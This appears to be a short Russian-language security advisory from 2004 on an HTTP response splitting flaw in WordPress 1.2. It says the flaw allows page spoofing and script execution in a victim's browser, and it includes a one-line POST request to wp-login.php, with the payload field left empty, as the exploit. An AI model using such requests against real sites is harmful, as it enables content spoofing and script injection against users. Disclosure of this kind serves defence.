| Дата публикации: | 12.10.2004 |
| Всего просмотров: | 3285 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: WordPress 1.2
Описание: Обнаружена уязвимость при обработке входных данных. Удаленный атакующий может подменить содержание уязвимой страницы и выполнить произвольный сценарий в браузере жертвы. Эксплоит:
POST /wp-login.php HTTP/1.0 action=login&mode=profile&log=USER&pwd=PASS&text= URL производителя: www.wordpress.org/ Решение:Установите обновление: |
|
| Ссылки: | HTTP Response Splitting in WordPress 1.2 |